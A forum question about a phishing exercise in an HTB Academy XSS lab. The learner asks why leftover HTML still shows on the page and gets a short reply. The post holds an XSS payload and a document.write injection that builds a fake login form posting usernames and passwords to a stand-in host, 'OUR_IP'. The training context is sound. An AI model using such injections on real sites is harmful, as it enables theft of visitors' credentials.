Htb academy xss module phishing

Hey, I can’t get the page to get ride of image viewer HTML code…

it always looks like this:


I used XXS strike to find this payload:

Payload: '><d3v%09ONMoUsEoVer+=+[8].find(confirm)>v3dm0s

this is the payload im using:


Please login to continue

');document.getElementById(‘urlform’).remove(); <!–].find(confirm)>v3dm0s

I also just tried using:

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

can anyone give me a hint? does it even matter? why doesn’t my page look clean like their screenshot? I’m just curious what am I doing wrong?

I recently went over that module myself, and I also could not get rid of the html code. I tried different things, but none works, so I just moved on!